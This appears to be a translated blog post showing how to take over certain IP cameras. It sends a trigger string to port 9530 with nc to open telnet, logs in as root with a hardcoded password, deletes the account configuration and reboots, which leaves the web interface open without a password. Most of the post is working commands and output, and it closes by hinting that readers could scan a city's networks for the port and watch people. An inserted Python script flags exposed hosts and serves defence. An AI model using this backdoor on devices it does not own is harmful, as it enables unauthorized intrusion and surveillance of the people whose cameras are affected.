You are Big Brother, or try yourself in the role of the all-seeing eye



    A fairy tale

    A gentleman once bought a reliable cast-iron door with locks that had a zillion combinations, but after installation the hinges began to creak. He called in a specialist and sat in his kitchen drinking tea while he waited. Suddenly the installer walked up to him and said in a human voice: "The job is done. The hinges are oiled, go and check." The master asked him: "How did you get in through the cast-iron door, which is certified left and right?" The workman replied: "So as not to wait on the threshold until you, dear master, deign to let us in, we and our certified experts built in a secret button: knock on the upper left corner of the door and it opens."

    Nonsense, you think, that only happens in fairy tales. And you would be fundamentally wrong.

    In this post I will prove convincingly, with examples, that such developers exist.

    Somehow an IP camera came into my hands, from a country famous for the unique quality of its manufactured equipment, with an unknown password. Googling how to reset the settings led me to a utility that resets this password, and the way it does so caught my interest.

    Here is what was initially discovered on the camera.
    Host is up (0.0014s latency).
    Not shown: 65529 closed ports
    PORT STATE SERVICE
    80/tcp open http
    554/tcp open rtsp
    8899/tcp open ospf-lite
    9527/tcp open unknown
    9530/tcp open unknown
    34567/tcp open unknown

    WEB is password protected. CLI no.

    We start tcpdump, then start the password reset utility.
    We see that the command \rOpenTelnet:OpenOnce is sent to port 9530/tcp. After that, telnet opens on the device, and the program connects to port 23 and uses predefined passwords to reset the password-related configuration.



    Let's try to do everything manually
    1. Open telnet on the camera
    nc 192.168.1.10 9530
    \rOpenTelnet:OpenOnce

    Check that it is open
    nmap -p 1-65535 192.168.1.10

    PORT STATE SERVICE
    23/tcp open telnet
    80/tcp open http
    554/tcp open rtsp
    8899/tcp open ospf-lite
    9527/tcp open unknown
    9530/tcp open unknown
    34567/tcp open unknown

    We log in with the standard password
    telnet 192.168.1.10
    Trying 192.168.1.10 ...
    Connected to 192.168.1.10.
    Escape character is '^]'.
    LocalHost login: root
    Password: xmhdipc
    Welcome to Monitor Tech.
    # rm -rf /mnt/mtd/Config/Account*
    # reboot
    # Connection closed by foreign host.

    After rebooting, the camera is accessible via the web without a password. Enjoy it.
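
    To check your own address space for the state shown in the two scans above, this added example (not part of the original post) parses nmap's normal text output and reports hosts where 9530/tcp is reachable and where 23/tcp appeared between two scans. The function names, finding texts and sample scans are assumptions constructed for the illustration.

```python
import re

TRIGGER_PORT = 9530   # listener seen in the post's first scan
TELNET_PORT = 23      # present only in the post's second scan
HOST_LINE = re.compile(r"^\s*Nmap scan report for (\S+)")
PORT_LINE = re.compile(r"^\s*(\d+)\s*/\s*tcp\s+open\b")

def open_ports(scan_text):
    """Map host -> set of open TCP ports from nmap's normal text output."""
    hosts, current = {}, None
    for line in scan_text.splitlines():
        host = HOST_LINE.match(line)
        port = PORT_LINE.match(line)
        if host:
            current = hosts.setdefault(host.group(1), set())
        elif port and current is not None:
            current.add(int(port.group(1)))
    return hosts

def audit(before_text, after_text=None):
    """Return host -> findings; after_text is an optional later scan of the same hosts."""
    before = open_ports(before_text)
    after = open_ports(after_text) if after_text else {}
    findings = {}
    for host, ports in before.items():
        notes = []
        if TRIGGER_PORT in ports:
            notes.append("9530/tcp reachable: filter it and isolate the device")
        later = after.get(host, set())
        if TELNET_PORT in later - ports:
            notes.append("23/tcp appeared between scans: telnet was switched on")
        elif TELNET_PORT in ports:
            notes.append("23/tcp open: telnet already enabled")
        if notes:
            findings[host] = notes
    return findings

# Constructed sample scans; the addresses are examples, not real devices.
BEFORE = """Nmap scan report for 192.168.1.10
PORT      STATE SERVICE
80/tcp    open  http
9530/tcp  open  unknown
Nmap scan report for 192.168.1.20
PORT      STATE SERVICE
443/tcp   open  https
"""
AFTER = BEFORE.replace("80/tcp", "23/tcp    open  telnet\n80/tcp")
```

    Calling audit(BEFORE, AFTER) returns both findings for 192.168.1.10 and nothing for 192.168.1.20.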

    What the equipment manufacturer is guided by when it leaves such holes is not clear to me personally.

    Dear readers, never scan the network of the city you would like to observe for open port 9530, and do not perform the actions described above; this may lead to a desire to go on vacation or go on a trip.
